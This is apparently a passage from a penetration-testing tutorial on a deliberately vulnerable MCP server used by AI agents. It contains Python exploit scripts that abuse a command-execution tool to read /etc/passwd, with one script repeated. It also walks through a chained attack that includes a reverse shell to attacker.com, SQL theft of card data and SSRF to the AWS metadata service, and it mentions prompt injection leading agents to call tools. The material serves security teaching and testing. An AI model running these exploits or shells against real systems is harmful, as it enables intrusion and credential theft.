send_request(init)
proc.stdin.write(json.dumps({"jsonrpc": "2.0", "method": "notifications/initialized"}) + "\n")
proc.stdin.flush()

# Exploit command injection to read /etc/passwd
cmd_inject = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "execute_system_command",
        "arguments": {"command": "cat /etc/passwd | head -5"}
    },
    "id": 2
}
resp = send_request(cmd_inject)
output = resp["result"]["content"][0]["text"].strip()

print(f"[+] Command injection payload sent: cat /etc/passwd")
print(f"\n[!!!] COMMAND INJECTION EXPLOIT SUCCESSFUL")
print(f"[!!!] Server executed the command and returned:")
print(output)

proc.terminate()

#!/usr/bin/env python3
import subprocess
import json
import sys
import time

proc = subprocess.Popen(
    ["python3", "server.py"],
    stdin=subprocess.PIPE,
    stdout=subprocess.PIPE,
    stderr=sys.stderr,
    text=True,
    bufsize=1
)

def send_request(req):
    proc.stdin.write(json.dumps(req) + "\n")
    proc.stdin.flush()
    lines = []
    while True:
        line = proc.stdout.readline()
        if not line:
            break
        lines.append(line)
        try:
            return json.loads("".join(lines))
        except json.JSONDecodeError:
            continue
    return None

# Initialize connection
init = {
    "jsonrpc": "2.0",
    "method": "initialize",
    "params": {
        "protocolVersion": "0.1.0",
        "capabilities": {},
        "clientInfo": {"name": "cmd-inject-exploit", "version": "1.0"}
    },
    "id": 1
}
send_request(init)
proc.stdin.write(json.dumps({"jsonrpc": "2.0", "method": "notifications/initialized"}) + "\n")
proc.stdin.flush()

# Exploit command injection to read /etc/passwd
cmd_inject = {
    "jsonrpc": "2.0",
    "method": "tools/call",
    "params": {
        "name": "execute_system_command",
        "arguments": {"command": "cat /etc/passwd | head -5"}
    },
    "id": 2
}
resp = send_request(cmd_inject)
output = resp["result"]["content"][0]["text"].strip()

print(f"[+] Command injection payload sent: cat /etc/passwd")
print(f"\n[!!!] COMMAND INJECTION EXPLOIT SUCCESSFUL")
print(f"[!!!] Server executed the command and returned:")
print(output)

proc.terminate()

Phase-5: What An Attacker Could Do In A Real Scenario (Post-Exploitation)

The two scripts above show individual exploits. But in a real attack, these would be chained together. Here is what an attacker could actually do:

First — The attacker calls list_environment and discovers the admin backdoor token superSecretAdminToken123 exposed in environment variables.

Second — Using that token, the attacker calls authenticate_user with any username and the token. The server grants full admin access.

Third — With admin access, the attacker calls database_query with SELECT * FROM users and steals every user account including credit cards and API keys.

Fourth — The attacker uses execute_system_command to install a reverse shell: bash -i >& /dev/tcp/attacker.com/4444 0>&1. Now they have persistent access even if the MCP server is restarted.

Fifth — The attacker uses proxy_request to reach the AWS metadata service at http://169.254.169.254/ and steals IAM credentials for the cloud environment.

Sixth — With those cloud credentials, the attacker accesses S3 buckets, EC2 instances, and other cloud resources. Customer data is stolen. Infrastructure is compromised.

In a real production environment, the impact could be catastrophic.

Phase 6: Reporting

As a pentester, the final report is your most important deliverable. Writing a high-quality report for an MCP security assessment requires focusing on three core areas to help development teams remediate risks effectively:

1. Separate LLM Decisions from Tool Execution

Clearly distinguish between model-level issues (e.g., prompt injection tricking the AI into calling a tool) and tool-level issues (e.g., the underlying code executing an unsafe action). Emphasize that the MCP server must validate inputs and enforce security controls independently of whatever the LLM sends it.

2. Translate Agentic Risks into Business Impact

Go beyond technical classifications to explain how autonomous integrations change the threat landscape. Describe the business risk of allowing an AI agent to execute these actions such as direct data exposure, unauthorized cloud infrastructure access, or third-party SaaS tampering especially when triggered without human intervention.

3. Provide Replayable JSON-RPC Payloads

Because MCP communicates using structured JSON-RPC 2.0 messages, provide the exact payloads sent and received during your testing. This allows developers to easily replay the exact requests through standard command-line tools to verify and patch the vulnerabilities.

The USB-C of AI is here, and it is not going anywhere. It will connect your files, your databases, your cloud, and your APIs to every AI agent you trust. But trust without verification is just hope. We built a vulnerable server, discovered its fifteen tools, enumerated every dangerous function, confirmed command injection and IDOR and path traversal, and wrote working exploits that stole credit cards and read system files. None of this required a nation-state actor or zero‑day magic. Just a Python script and a systematic methodology. The same methodology you can use tomorrow on any MCP server in your scope. The vulnerabilities we found have simple fixes. The ecosystem will catch up. But until it does, the responsibility falls on us, the pentesters, the developers, the security teams who refuse to treat AI as magic. Go break things. Find the flaws. Help fix them. That is what this work is about.